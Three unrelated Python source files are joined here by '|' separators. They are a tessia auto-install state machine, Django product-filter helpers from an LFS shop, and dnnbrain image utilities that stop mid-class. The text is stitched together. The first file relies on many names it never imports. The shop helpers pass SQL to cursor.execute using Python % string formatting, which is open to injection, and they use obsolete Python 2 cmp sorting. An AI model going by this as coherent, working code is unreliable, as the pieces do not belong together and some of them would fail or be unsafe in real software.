from urllib.parse import urlsplit
import ipaddress
import json
import logging
import os
#
# CONSTANTS AND DEFINITIONS
#
MACHINE_DESCRIPTION = 'Autoinstall {} with OS {}'
# directory containing the kernel cmdline templates
CMDLINE_TEMPLATES_DIR = os.path.dirname(
os.path.abspath(__file__)) + "/templates/"
# Schema for the installation request
INSTALL_REQ_PARAMS_SCHEMA = {
"type": "object",
"properties": {
"os": {"type": "string"},
"profile": {"type": "string"},
"template": {"type": "string"},
"repos": {
"type": "array",
"items": {
"type": "string",
},
},
"system": {"type": "string"},
"verbosity": {"type": "string", "enum": list(BaseMachine._LOG_LEVELS)}
},
"required": [
"os",
"system"
],
"additionalProperties": False
}
SUPPORTED_TYPES = {
SmAnaconda.DISTRO_TYPE: SmAnaconda,
SmAutoyast.DISTRO_TYPE: SmAutoyast,
SmDebianInstaller.DISTRO_TYPE: SmDebianInstaller,
SmSubiquityInstaller.DISTRO_TYPE: SmSubiquityInstaller,
}
#
# CODE
#
class AutoInstallMachine(BaseMachine):
"""
Facade to represent the auto install state machine, in fact acts as a proxy
to the real machine since at instantiation time we don't know which distro
is being installed and thus can't determine the right class to use.
"""
def __init__(self, params):
"""
See base class docstring.
Args:
params (str): string representation of JSON object
with schema INSTALL_REQ_PARAMS_SCHEMA
"""
super().__init__(params)
# open the db connection
MANAGER.connect()
parsed = self.parse(params)
self._params = parsed['params']
# apply custom log level if specified
self._log_config(self._params.get('verbosity'))
self._logger = logging.getLogger(__name__)
self._model = self._model_from_params(self._params)
self._machine = self._create_machine()
# __init__()
def _create_platform(self):
"""
Create an instance of machine platform, which is linked to
baselib's hypervisor
"""
hyp_profile_obj = self._model.system_profile.hypervisor
if isinstance(hyp_profile_obj,
AutoinstallMachineModel.HmcHypervisor):
plat_class = PlatLpar
elif isinstance(hyp_profile_obj,
AutoinstallMachineModel.ZvmHypervisor):
plat_class = PlatZvm
elif isinstance(hyp_profile_obj,
AutoinstallMachineModel.KvmHypervisor):
plat_class = PlatKvm
else:
raise RuntimeError('Support for {} is not implemented'.format(
hyp_profile_obj.__class__.__qualname__))
hyp_obj = plat_class.create_hypervisor(self._model)
platform = plat_class(self._model, hyp_obj)
return platform
# _create_platform()
def _create_machine(self):
"""
Create the correct state machine based on the operating system being
installed.
"""
self._model.validate()
# model can accept any OS type, but we have only this many implemented
os_entry = self._model.operating_system
if os_entry.type not in SUPPORTED_TYPES:
raise ValueError("OS type '{}' is not supported for installation"
.format(os_entry.type))
if os_entry.type == 'debian' and os_entry.major >= 2004:
if os_entry.minor == 0 and self._model.ubuntu20_legacy_installer:
self._logger.info("NOTE: tessia_option_installer=legacy"
" is specified in the profile")
self._logger.info("NOTE: please make sure that repo and"
" template are set accordingly")
self._logger.info("NOTE: failure to do so will result in"
" cryptic error messages")
sm_class = SUPPORTED_TYPES[os_entry.type]
else:
sm_class = SmSubiquityInstaller
else:
sm_class = SUPPORTED_TYPES[os_entry.type]
dbctrl = DbController(MANAGER)
platform = self._create_platform()
# PostInstallChecker expects database objects, so we fetch them again
_, profile_obj = dbctrl._get_sysprof_entries(
self._model.system_profile.system_name,
self._model.system_profile.profile_name)
# we pass os_entry, which is compatible to database entry
post_install = PostInstallChecker(profile_obj, os_entry,
permissive=True)
self._logger.debug("Creating machine class %s for %s",
sm_class.__name__, str(os_entry))
machine = sm_class(self._model, platform,
post_install_checker=post_install)
machine.persist_init_data(dbctrl)
return machine
# _create_machine()
@staticmethod
def _filter_os_repos_by_subnet(
os_repos: "list[AutoinstallMachineModel.OsRepository]",
# pylint: disable=line-too-long
subnets: "list[union[ipaddress.IPv4Network,ipaddress.IPv6Network]]"):
"""
From os repos choose those that are in specified subnets
"""
result = []
for os_repo in os_repos:
try:
repo_addr = gethostbyname(
urlsplit(os_repo.url).netloc.rsplit('@', 1)[-1])
address_pyobj = ipaddress.ip_address(repo_addr)
# can't resolve repo's hostname: skip it
except Exception:
continue
if any(address_pyobj in subnet for subnet in subnets):
result.append(os_repo)
return result
# _filter_os_repos_by_subnet()
@staticmethod
def _get_installer_cmdline_template(
os_entry: AutoinstallMachineModel.OperatingSystem):
"""
Retrieve installation kernel command line
"""
# use a corresponding generic template for the OS type
# Note that actual template may be overridden by state machine
template_filename = '{}.cmdline.jinja'.format(os_entry.type)
with open(CMDLINE_TEMPLATES_DIR + template_filename,
"r") as template_file:
template_content = template_file.read()
return AutoinstallMachineModel.Template(template_filename,
template_content)
# _get_installer_cmdline_template()
def _model_from_params(self, params):
"""
Create model from machine params
"""
# we can use static class, not an instance,
# because instance only makes sure database is connected
dbctrl = DbController(MANAGER)
os_entry, os_repos = dbctrl.get_os(params['os'])
if 'template' in params:
template_entry = dbctrl.get_template(params['template'])
elif os_entry.template_name:
template_entry = dbctrl.get_template(os_entry.template_name)
else:
raise ValueError("No installation template for OS '{}' specified"
.format(os_entry.name))
# get installer template
installer_template = self._get_installer_cmdline_template(os_entry)
system_model = dbctrl.get_system(params['system'],
params.get("profile"))
# from all the os repos choose those that can be accessed
# via gateway interface define on the system
gateway_subnets = [network.subnet for network in
system_model.list_gateway_networks()]
accessible_os_repos = self._filter_os_repos_by_subnet(
os_repos, gateway_subnets)
if not accessible_os_repos:
# fallback if no "better" repo was found
accessible_os_repos = os_repos
custom_os_repos, custom_package_repos = dbctrl.get_custom_repos(
params.get('repos', []))
install_opts = dbctrl.get_install_opts(params['system'],
params.get("profile"))
model = AutoinstallMachineModel(os_entry, accessible_os_repos,
template_entry, installer_template,
custom_os_repos, custom_package_repos,
system_model, install_opts)
return model
# _model_from_params()
def cleanup(self):
"""
Proxy the call to the real machine to perform cleanup.
"""
# When the job is canceled during a cleanup the routine
# is not executed again by the scheduler.
self.cleaning_up = True
self._logger.info("AutoInstall cleanup is running")
return self._machine.cleanup()
# cleanup()
@classmethod
def parse(cls, params):
"""
Args:
params(str): A string containing a json in the format defined by
the INSTALL_REQ_PARAMS_SCHEMA variable.
Returns:
dict: Resources allocated for the installation
Has "resources" and "description" entries
(tp be conusmed by scheduler)
and "params" as a an object according to schema
Raises:
SyntaxError: if content is in wrong format.
ValueError: if certain properties are not defined.
"""
try:
params = json.loads(params)
validate(params, INSTALL_REQ_PARAMS_SCHEMA)
except Exception as exc:
raise SyntaxError("Invalid request parameters") from exc
# make a few requests to get necessary parameters
dbctrl = DbController(MANAGER)
# check which format the profile parameter is using
system, _ = dbctrl._get_sysprof_entries(params['system'], None)
os_entry, _ = dbctrl.get_os(params['os'])
result = {
'resources': {'shared': [], 'exclusive': []},
'description': MACHINE_DESCRIPTION.format(
system.name, os_entry.name),
'params': params
}
# the system being installed is considered an exclusive resource
result['resources']['exclusive'].append(system.name)
system = system.hypervisor_rel
# the nested hypervisor hierarchy is considered a shared resource
while system is not None:
result.get("resources").get("shared").append(system.name)
system = system.hypervisor_rel
# check required FCP parameters- use schema to validate specs field
# -- should be checked in API instead
# in case the system profile has no hypervisor profile defined the
# machine's constructor will use the hypervisor's default profile,
# therefore there is no need to check it here.
return result
# parse()
def start(self):
"""
Proxy the call to the real machine to start execution.
"""
try:
self._machine.start()
except:
DbController(MANAGER).clear_target_os_field(self._model)
raise
# if we got here, machine executed successfully
# update OS field on the target system
DbController(MANAGER).set_target_os_field(self._model)
# To make sure the cleaning_up variable is set correctly,
# run the cleanup here.
self.cleanup()
return 0
# start()
# AutoInstallMachine
|
import locale
# django imports
from django.conf import settings
from django.core.cache import cache
from django.db import connection
from django.core.exceptions import FieldError
from django.db.models import Q, Count, Min, Max
# import lfs
import lfs.catalog.models
from lfs.catalog.settings import CONFIGURABLE_PRODUCT
from lfs.catalog.settings import STANDARD_PRODUCT
from lfs.catalog.settings import PRODUCT_WITH_VARIANTS
from lfs.catalog.settings import PROPERTY_VALUE_TYPE_FILTER
# Load logger
import logging
from lfs.manufacturer.models import Manufacturer
logger = logging.getLogger("default")
# TODO: Add unit test
def get_current_top_category(request, obj):
"""
Returns the current top category of a product.
"""
if obj.__class__.__name__.lower() == "product":
category = obj.get_current_category(request)
else:
category = obj
if category is None:
return category
while category.parent is not None:
category = category.parent
return category
def get_price_filters(category, product_filter, price_filter, manufacturer_filter):
""" Creates price filter based on the min and max prices of the category's
products
"""
# If a price filter is set we return just this.
if price_filter:
return {
"show_reset": True,
"min": locale.format("%.2f", price_filter["min"]),
"max": locale.format("%.2f", price_filter["max"]),
"disabled": False,
}
# Base are the filtered products
products = get_filtered_products_for_category(category, product_filter, price_filter, None, manufacturer_filter)
if not products:
return []
all_products = lfs.catalog.models.Product.objects.filter(Q(pk__in=products) | (Q(parent__in=products) & Q(active=True)))
res = all_products.aggregate(min_price=Min('effective_price'), max_price=Max('effective_price'))
pmin, pmax = res['min_price'], res['max_price']
disabled = (pmin and pmax) is None
try:
pmin = locale.format("%.2f", pmin)
except TypeError:
pmin = 0.0
try:
pmax = locale.format("%.2f", pmax)
except TypeError:
pmax = 0.0
return {
"show_reset": False,
"min": pmin,
"max": pmax,
"disabled": disabled,
}
def get_manufacturer_filters(category, product_filter, price_filter, manufacturer_filter):
"""Creates manufacturer filter links based on the manufacturers bound to the products in category
"""
# Base are the filtered products
products = get_filtered_products_for_category(category, product_filter, price_filter, None, None)
if not products:
return []
all_products = lfs.catalog.models.Product.objects.filter(Q(pk__in=products) | (Q(parent__in=products) & Q(active=True)))
# And their parents
# product_ids = []
# for product in products:
# if product.parent:
# product_ids.append(product.parent_id)
# else:
# product_ids.append(product.pk)
out = {"show_reset": False}
if manufacturer_filter:
out = {
"show_reset": True
}
else:
manufacturer_filter = []
qs = Manufacturer.objects.filter(products__in=all_products).annotate(products_count=Count('products'))
out['items'] = [{'obj': obj, 'selected': obj.pk in manufacturer_filter} for obj in qs]
return out
def get_product_filters(category, product_filter, price_filter, manufacturer_filter, sorting):
"""Returns the next product filters based on products which are in the given
category and within the result set of the current filters.
"""
properties_mapping = get_property_mapping()
options_mapping = get_option_mapping()
property_ids = _get_property_ids()
product_ids = _get_product_ids(category)
set_filters = dict(product_filter)
########## Number Fields ###################################################
number_fields = []
cursor = connection.cursor()
cursor.execute("""SELECT property_id, min(value_as_float), max(value_as_float)
FROM catalog_productpropertyvalue
WHERE type=%s
AND product_id IN (%s)
AND property_id IN (%s)
GROUP BY property_id""" % (PROPERTY_VALUE_TYPE_FILTER, product_ids, property_ids))
for row in cursor.fetchall():
prop = properties_mapping[row[0]]
if prop.is_select_field or prop.is_text_field or not prop.filterable:
continue
if product_filter.get("number-filter", {}).get(str(prop.id)):
pmin, pmax = product_filter.get("number-filter").get(str(prop.id))[0:2]
show_reset = True
else:
pmin, pmax = row[1:3]
show_reset = False
try:
pmin = locale.format("%.2f", float(pmin))
except TypeError:
pmin = 0.0
try:
pmax = locale.format("%.2f", float(pmax))
except TypeError:
pmax = 0.0
number_fields.append({
"id": row[0],
"position": prop.position,
"object": prop,
"name": prop.name,
"title": prop.title,
"unit": prop.unit,
"show_reset": show_reset,
"show_quantity": True,
"items": {"min": pmin, "max": pmax},
})
########## Select Fields & Text Fields #####################################
result = []
cursor = connection.cursor()
cursor.execute("""SELECT property_id, value
FROM catalog_productpropertyvalue
WHERE type=%s
AND product_id IN (%s)
AND property_id IN (%s)
GROUP BY property_id, value""" % (PROPERTY_VALUE_TYPE_FILTER, product_ids, property_ids))
properties = {}
for row in cursor.fetchall():
prop = properties_mapping[row[0]]
if prop.is_number_field or not prop.filterable:
continue
if prop.is_select_field:
name = options_mapping[row[1]].name
position = options_mapping[row[1]].position
else:
name = row[1]
position = 10
if name == row[1] and name == '':
continue
if row[0] not in properties:
properties[row[0]] = []
properties[row[0]].append({
"id": row[0],
"value": row[1],
"name": name,
"title": prop.title,
"position": position,
"show_quantity": True,
})
# Creates the filters to count the existing products per property option,
# which is used within the filter portlet
new_product_filter = {}
if product_filter.get("number-filter"):
new_product_filter["number-filter"] = product_filter["number-filter"]
for prop, options in properties.items():
for option in options:
# The option in question is used at any rate
new_product_filter["select-filter"] = {str(prop): option["value"]}
# All checked options of all other properties is also used
for f0, f1 in product_filter.get("select-filter", {}).items():
if f0 != str(prop):
new_product_filter["select-filter"][f0] = f1
# Tests if the option is checked
if (f0 == str(prop)) and (option["value"] in f1.split("|")):
option["checked"] = True
option["quantity"] = len(get_filtered_products_for_category(category, new_product_filter, price_filter, None))
# Transform the group properties into a list of dicts
for property_id, items in properties.items():
prop = properties_mapping[property_id]
items.sort(lambda a, b: cmp(a["position"], b["position"]))
# Move items with zero quantity to the end of the list
for x in range(0, len(items)):
if items[x]["quantity"] == 0:
items.insert(len(items), items.pop(x))
result.append({
"id": property_id,
"position": prop.position,
"unit": prop.unit,
"show_reset": str(property_id) in set_filters.get('select-filter', {}).keys(),
"name": prop.name,
"title": prop.title,
"items": items,
})
result.sort(lambda a, b: cmp(a["position"], b["position"]))
return {
"select_fields": result,
"number_fields": number_fields,
}
def _get_property_ids():
property_ids = lfs.catalog.models.ProductPropertyValue.objects.distinct().values_list('property_id', flat=True)
return ", ".join(map(str, property_ids))
def _get_product_ids(category):
products = category.get_all_products()
if not products:
return []
all_products = lfs.catalog.models.Product.objects.filter(Q(pk__in=products) | (Q(parent__in=products) & Q(active=True)))
product_ids = all_products.values_list('id', flat=True)
return ", ".join(map(str, product_ids))
# TODO: Implement this as a method of Category
def get_filtered_products_for_category(category, filters, price_filter, sorting, manufacturers_filter=None):
"""Returns products for given categories and current filters sorted by
current sorting.
"""
from lfs.catalog.models import Product, ProductPropertyValue
if filters:
if category.show_all_products:
products = category.get_all_products()
else:
products = category.get_products()
# All variants of category products
all_variants = Product.objects.filter(parent__in=products)
# Generate filter
filters_query = Q()
for prop, value in filters.get("select-filter", {}).items():
if value.find("|") == -1:
q = Q(property_id=prop, value=value)
else:
options = []
q_options = Q()
for option in value.split("|"):
q_options |= Q(value=option)
q = Q(property_id=prop) & q_options
filters_query |= q
for prop, values in filters.get("number-filter", {}).items():
q = Q(property_id=prop, value_as_float__range=(values[0], values[1]))
filters_query |= q
# The idea behind SQL query generated below is: If for every filter (property=value) for a product id exists
# a "product property value" the product matches.
#
# Example ValuesListQuerySet built by statements below is:
#
# ProductPropertyValue.objects.filter(Q(property_id=1, value='1') | Q(property_id=2, value='1'),
# product__in=products,
# type=PROPERTY_VALUE_TYPE_FILTER) \
# .values('product_id') \
# .annotate(cnt=Count('id')).filter(cnt=2).values_list('product_id', flat=True)
#
# it evaluates to:
#
# SELECT "catalog_productpropertyvalue"."product_id"
# FROM "catalog_productpropertyvalue"
# WHERE ((
# ("catalog_productpropertyvalue"."value" = 1 AND "catalog_productpropertyvalue"."property_id" = 1 )
# OR
# ("catalog_productpropertyvalue"."value" = 1 AND "catalog_productpropertyvalue"."property_id" = 2 )
# )
# AND "catalog_productpropertyvalue"."type" = 0
# AND "catalog_productpropertyvalue"."product_id" IN (SELECT U0."id"
# FROM "catalog_product" U0
# WHERE U0."name" LIKE %da% ESCAPE '\' ))
# GROUP BY "catalog_productpropertyvalue"."product_id"
# HAVING COUNT("catalog_productpropertyvalue"."id") = 2
length = len(filters.get("select-filter", {}).items()) + len(filters.get("number-filter", {}).items())
# PRODUCTS - get all products with matching filters.
matching_product_ids = ProductPropertyValue.objects.filter(product__in=products,
type=PROPERTY_VALUE_TYPE_FILTER)
if filters_query is not None:
matching_product_ids = matching_product_ids.filter(filters_query)
matching_product_ids = matching_product_ids.values('product_id').annotate(cnt=Count('id')) \
.filter(cnt=length).values_list('product_id', flat=True)
# VARIANTS - get matching variants and then their parents as we're interested in products with variants,
# not variants itself
matching_variant_ids = ProductPropertyValue.objects.filter(product__in=all_variants,
type=PROPERTY_VALUE_TYPE_FILTER)
if filters_query is not None:
matching_variant_ids = matching_variant_ids.filter(filters_query)
matching_variant_ids = matching_variant_ids.values('product_id').annotate(cnt=Count('id')) \
.filter(cnt=length).values_list('product_id', flat=True)
variant_products = Product.objects.filter(pk__in=matching_variant_ids)
# Merge results
products = Product.objects.filter(Q(pk__in=matching_product_ids) |
Q(pk__in=variant_products.values_list('parent_id', flat=True))).distinct()
else:
categories = [category]
if category.show_all_products:
categories.extend(category.get_all_children())
products = lfs.catalog.models.Product.objects.filter(
active=True,
categories__in=categories,
sub_type__in=[STANDARD_PRODUCT, PRODUCT_WITH_VARIANTS, CONFIGURABLE_PRODUCT]).distinct()
# TODO: It might be more effective to move price filters directly into if/else clause above
if price_filter:
# Get all variants of the products
variants = lfs.catalog.models.Product.objects.filter(parent__in=products, active=True)
# Filter the variants by price
variants = variants.filter(effective_price__range=[price_filter["min"],
price_filter["max"]])
# Filter the products
filtered_products = products.filter(effective_price__range=[price_filter["min"],
price_filter["max"]], active=True)
# merge the result and get a new query set of all products
# We get the parent ids of the variants as the "product with variants"
# should be displayed and not the variants.
products = lfs.catalog.models.Product.objects.filter(
Q(pk__in=filtered_products) | Q(pk__in=variants.values_list('parent_id', flat=True)))
if manufacturers_filter:
# Get all variants of the products
variants = lfs.catalog.models.Product.objects.filter(parent__in=products)
# Filter the variants by manufacturer
variants = variants.filter(manufacturer__in=manufacturers_filter)
# Filter the products
filtered_products = products.filter(manufacturer__in=manufacturers_filter)
# merge the result and get a new query set of all products
# We get the parent ids of the variants as the "product with variants"
# should be displayed and not the variants.
products = lfs.catalog.models.Product.objects.filter(
Q(pk__in=filtered_products) | Q(pk__in=variants.values_list('parent_id', flat=True)))
if sorting:
try:
products = products.order_by(sorting)
except FieldError:
# ignore invalid sort order which may be stored in the session
pass
return products
def get_option_mapping():
"""Returns a dictionary with option id to property name.
"""
options = {}
for option in lfs.catalog.models.PropertyOption.objects.all():
options[str(option.id)] = option
return options
def get_property_mapping():
"""Returns a dictionary with property id to property name.
"""
properties = {}
for property in lfs.catalog.models.Property.objects.all():
properties[property.id] = property
return properties
def _calculate_steps(product_ids, property, min, max):
"""Calculates filter steps.
**Parameters**
product_ids
The product_ids for which the steps are calculated. List of ids.
property
The property for which the steps are calculated. Instance of Property.
min / max
The min and max value of all steps. Must be a Float.
"""
try:
min = float(min)
max = float(max)
except TypeError:
return []
result = []
filter_steps = lfs.catalog.models.FilterStep.objects.filter(property=property.id)
if property.is_steps_step_type:
for i, step in enumerate(filter_steps[:len(filter_steps) - 1]):
min = step.start
if i != 0:
min += 1.0
max = filter_steps[i + 1].start
result.append({
"min": min,
"max": max,
"quantity": _calculate_quantity(product_ids, property.id, min, max)
})
else:
if property.is_automatic_step_type:
if max == min:
step = max
else:
diff = max - min
step = diff / 3 # TODO: Should this be variable?
if step >= 0 and step < 2:
step = 1
elif step >= 2 and step < 6:
step = 5
elif step >= 6 and step < 11:
step = 10
elif step >= 11 and step < 51:
step = 50
elif step >= 51 and step < 101:
step = 100
elif step >= 101 and step < 501:
step = 500
elif step >= 501 and step < 1001:
step = 1000
elif step >= 1000 and step < 5001:
step = 500
elif step >= 5001 and step < 10001:
step = 1000
else:
step = property.step
for n, i in enumerate(range(0, int(max), step)):
if i > max:
break
min = i + 1
max = i + step
result.append({
"min": min,
"max": max,
"quantity": _calculate_quantity(product_ids, property.id, min, max),
})
if property.display_no_results:
return result
else:
# Remove entries with zero products
new_result = []
for n, f in enumerate(result):
if f["quantity"] == 0:
try:
result[n + 1]["min"] = f["min"]
except IndexError:
pass
continue
new_result.append(f)
return new_result
def _calculate_quantity(product_ids, property_id, min, max):
"""Calculate the amount of products for given parameters.
"""
# Count entries for current filter
cursor = connection.cursor()
cursor.execute("""SELECT property_id, value, parent_id
FROM catalog_productpropertyvalue
WHERE product_id IN (%s)
AND property_id = %s
AND value_as_float BETWEEN %s AND %s""" % (product_ids, property_id, min, max))
already_count = {}
amount = 0
for row in cursor.fetchall():
# We count a property/value pair just one time per *product*. For
# "products with variants" this could be stored several times within the
# catalog_productpropertyvalue. Imagine a variant with two properties
# color and size:
# v1 = color:red / size: s
# v2 = color:red / size: l
# But we want to count color:red just one time. As the product with
# variants is displayed at not the variants.
if "%s%s%s" % (row[2], row[0], row[1]) in already_count:
continue
already_count["%s%s%s" % (row[2], row[0], row[1])] = 1
amount += 1
return amount
|
import os
import cv2
import copy
import time
import torch
import numpy as np
from PIL import Image
from os.path import join as pjoin
from copy import deepcopy
from sklearn.decomposition import PCA
from sklearn.linear_model import LinearRegression, LogisticRegression, Lasso
from sklearn.svm import SVC
from sklearn.model_selection import StratifiedKFold, KFold, cross_val_score
from sklearn.metrics import pairwise_distances, confusion_matrix
from sklearn.metrics import r2_score, explained_variance_score
from scipy.signal import periodogram
from scipy.stats import pearsonr
from torchvision import transforms
DNNBRAIN_MODEL = pjoin(os.environ['DNNBRAIN_DATA'], 'models')
def correlation_score(y_true, y_pred, multioutput='uniform_average'):
"""
Parameters
----------
y_true : ndarray with shape as (n_samples,) or (n_samples, n_outputs)
Ground truth target values.
y_pred : ndarray with shape as (n_samples,) or (n_samples, n_outputs)
Estimated target values.
multioutput : string in ['raw_values', 'uniform_average']
'raw_values' :
Returns a full set of scores in case of multioutput input.
'uniform_average' :
Scores of all outputs are averaged with uniform weight.
Returns
-------
score : float or ndarray of floats
a single value if 'multioutput' is 'uniform_average'
a ndarray if 'multioutput' is 'raw_values'
"""
# check y
if y_true.ndim == 1:
y_true = y_true[:, None]
elif y_true.ndim == 2:
pass
else:
raise ValueError("y_true is a ndarray with shape as (n_samples,) or "
"(n_samples, n_outputs)")
if y_pred.ndim == 1:
y_pred = y_pred[:, None]
elif y_pred.ndim == 2:
pass
else:
raise ValueError("y_pred is a ndarray with shape as (n_samples,) or "
"(n_samples, n_outputs)")
assert y_true.shape == y_pred.shape
# scoring
n_output = y_true.shape[1]
score = np.zeros(n_output)
for output_idx in range(n_output):
score[output_idx] = pearsonr(y_true[:, output_idx], y_pred[:, output_idx])[0]
if multioutput == 'raw_values':
pass
elif multioutput == 'uniform_average':
score = np.mean(score)
else:
raise ValueError("Not supported multioutput: {}".format(multioutput))
return score
def correlation_scorer(regressor, X, y):
y_preds = regressor.predict(X)
return pearsonr(y, y_preds)[0]
def normalize(array):
"""
Normalize an array's value domain to [0, 1]
Note: the original normalize function is at dnnbrain/utils/util.py
but 'from dnnbrain.dnn.core import Mask' in the file causes import conflicts.
Fix the conflicts in future.
parameters
---------
array : ndarray
A numpy array waiting normalize.
Return
------
array : ndarray
A numpy array after normalization.
"""
array = (array - array.min()) / (array.max() - array.min())
return array
def array_statistic(arr, method, axis=None, keepdims=False):
"""
extract statistic of an array
Parameters
----------
arr : ndarray
A numpy array.
method : str
Feature extraction method
axis : int, tuple
None or int or tuple of ints.
Axis or axes along which to operate.
If it's None, operate on the whole array.
keepdims : bool
Keep the axis which is reduced.
Return
------
arr : ndarray
Extracted statistic.
"""
if method == 'max':
arr = np.max(arr, axis, keepdims=keepdims)
elif method == 'mean':
arr = np.mean(arr, axis, keepdims=keepdims)
elif method == 'median':
arr = np.median(arr, axis, keepdims=keepdims)
elif method == 'L1':
arr = np.linalg.norm(arr, 1, axis, keepdims=keepdims)
elif method == 'L2':
arr = np.linalg.norm(arr, 2, axis, keepdims=keepdims)
else:
raise ValueError('Not supported method:', method)
return arr
class ImageProcessor:
"""
Metrics for pre-processing pictures to further DNN operations.
"""
def __init__(self):
self.str2pil_interp = {
'nearest': Image.NEAREST,
'bilinear': Image.BILINEAR,
'bicubic': Image.BICUBIC,
'lanczos': Image.LANCZOS
}
self.str2cv2_interp = {
'nearest': cv2.INTER_NEAREST,
'bilinear': cv2.INTER_LINEAR,
'bicubic': cv2.INTER_CUBIC,
'lanczos': cv2.INTER_LANCZOS4
}
def _check_image(self, image):
"""
Check if the image is valid.
parameters
---------
image : ndarray, Tensor, PIL.Image
Image data.
If is ndarray or Tensor, its shape is (height, width) or (3, height, width).
"""
if isinstance(image, (np.ndarray, torch.Tensor)):
if image.ndim == 2:
pass
elif image.ndim == 3:
assert image.shape[0] == 3, "RGB channel must be the first axis."
else:
raise ValueError("Only two shapes are valid: "
"(height, width) and (3, height, width)")
elif isinstance(image, Image.Image):
pass
else:
raise TypeError("Only support three types of image: "
"ndarray, Tensor and PIL.Image.")
def to_array(self, image):
"""
Convert image to array.
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
Return
-------
arr : ndarray
Image array.
"""
self._check_image(image)
if isinstance(image, np.ndarray):
arr = image
elif isinstance(image, torch.Tensor):
arr = image.numpy()
else:
arr = np.asarray(image)
if arr.ndim == 3:
arr = arr.transpose((2, 0, 1))
elif arr.ndim == 2:
pass
else:
raise ValueError(f"Unsupported number of image dimensions: {arr.ndim}!")
return arr
def to_tensor(self, image):
"""
Convert image to tensor
parameters
---------
image : ndarray, Tensor, PIL.Image
Image data.
Return
------
tensor: Tensor
Image tensor.
"""
self._check_image(image)
if isinstance(image, np.ndarray):
tensor = torch.from_numpy(image)
elif isinstance(image, torch.Tensor):
tensor = image
else:
tensor = torch.from_numpy(self.to_array(image))
return tensor
def to_pil(self, image, normalization=False):
"""
Convert image to PIL.Image
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
normalization : bool
Normalization operation.
If is **True**, normalize image data to integers in [0, 255].
Return
------
image : PIL.Image
Output image with type of PIL.Image.
"""
self._check_image(image)
if normalization:
image = normalize(self.to_array(image)) * 255
image = image.astype(np.uint8)
if isinstance(image, torch.Tensor):
image = image.numpy()
if isinstance(image, np.ndarray):
if image.ndim == 3:
image = image.transpose((1, 2, 0))
image = Image.fromarray(image)
return image
def resize(self, image, size, interpolation='nearest'):
"""
Resize image.
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
size : tuple
The target size as a 2-tuple: (height, width).
interpolation : str
Interpolation method for resize,
check *self.str2pil_interp* and *self.str2cv2_interp* to
find the available interpolation.
Return
------
image : ndarray, Tensor, PIL.Image
Image data after resizing.
"""
self._check_image(image)
size = size[::-1]
if isinstance(image, Image.Image):
image = image.resize(size, self.str2pil_interp[interpolation])
elif isinstance(image, np.ndarray):
if image.ndim == 2:
image = cv2.resize(image, size,
interpolation=self.str2cv2_interp[interpolation])
else:
image = cv2.resize(image.transpose((1, 2, 0)), size,
interpolation=self.str2cv2_interp[interpolation])
image = image.transpose((2, 0, 1))
else:
image = image.numpy()
if image.ndim == 2:
image = cv2.resize(image, size,
interpolation=self.str2cv2_interp[interpolation])
else:
image = cv2.resize(image.transpose((1, 2, 0)), size,
interpolation=self.str2cv2_interp[interpolation])
image = image.transpose((2, 0, 1))
image = torch.from_numpy(image)
return image
def crop(self, image, box):
"""
Crop image with a rectangular region.
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
box : tuple
The crop rectangle as a (left, upper, right, lower)-tuple.
Return
------
image : ndarray, Tensor, PIL.Image
Image data after crop.
"""
self._check_image(image)
if isinstance(image, Image.Image):
image = image.crop(box)
else:
if image.ndim == 2:
image = image[box[1]:box[3], box[0]:box[2]]
else:
image = image[:, box[1]:box[3], box[0]:box[2]]
return image
def translate(self, image, bkg, startpoint, endpoint, stride):
"""
Translate image on a background based on given startpoint and stride,
only support one axis now.
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
bkg : ndarray, Tensor, PIL.Image
Same type with image.Remember bkg must bigger than image.
startpoint : tuple
The start point of translating in upper left position
as a (x_axis,y_axis)-tuple, horizontal:x_axis, vertical:y_axis.
endpoint : tuple
The end point of translating in upper left position
as a (x_axis,y_axis)-tuple (horizontal: x_axis; vertical: y_axis).
stride : int
Stride of each translation.
Return
------
image_tran : ndarray, Tensor, PIL.Image
Image data after translating, which add a dim in the first axis meaning n_stim.
"""
self._check_image(image)
self._check_image(bkg)
if type(image) != type(bkg):
raise TypeError("image and bkg must be the same type!")
if isinstance(image, np.ndarray):
if image.shape[1]>bkg.shape[1] | image.shape[2]>bkg.shape[2]:
raise ValueError("the size of bkg must bigger than image!")
#Juage axis
if startpoint[0] == endpoint[0]:
num = (endpoint[1]-startpoint[1])/stride
axis = 'Y'
elif startpoint[1] == endpoint[1]:
num = (endpoint[0]-startpoint[0])/stride
axis = 'X'
else:
raise ValueError("only support translating in one axis now!")
if int(num) - num != 0:
raise ValueError("length must be divisible by stride!")
#Start translating
num = int(num) + 1
image_tran = np.zeros((num, 3, bkg.shape[1], bkg.shape[2]))
for tr in range(num):
bkg_new = copy.deepcopy(bkg)
if axis == 'Y':
bkg_new[:, startpoint[0]+tr*stride:startpoint[0]+tr*stride+image.shape[1],
startpoint[1]:startpoint[1]+image.shape[2]] = image
else:
bkg_new[:, startpoint[0]:startpoint[0]+image.shape[1],
startpoint[1]+tr*stride:startpoint[1]+tr*stride+image.shape[2]] = image
image_tran[tr] = bkg_new
elif isinstance(image, Image.Image):
pass
else:
pass
return image_tran
def norm(self, image, ord):
"""
Calculate norms of the image by the following formula:
*sum(abs(image)**ord)**(1./ord)*
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
ord : int
The order of the norm.
Return
-------
norm : float
The norm of the image.
"""
image = self.to_array(image)
norm = np.linalg.norm(image.ravel(), ord)
return norm
def total_variation(self, image):
"""
Calculate total variation of the image.
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
Return
------
tv : float
Total variation.
"""
image = self.to_array(image)
# calculate the difference of neighboring pixel-values
if image.ndim == 3:
diff1 = image[:, 1:, :] - image[:, :-1, :]
diff2 = image[:, :, 1:] - image[:, :, :-1]
else:
diff1 = image[1:, :] - image[:-1, :]
diff2 = image[:, 1:] - image[:, :-1]
# calculate the total variation
tv = np.sum(np.abs(diff1)) + np.sum(np.abs(diff2))
return tv
class ImageSet:
"""
Build a dataset to load image.
"""
def __init__(self, img_dir, img_ids, labels=None, transform=None):
"""
Initialize ImageSet
Parameters
----------
img_dir : str
Images' parent directory.
img_ids : list
Each img_id is a path which can find the image file relative to img_dir.
labels : list
Each image's label.
transform : callable function
Optional transform to be applied on a stimulus.
"""
self.img_dir = img_dir
self.img_ids = img_ids
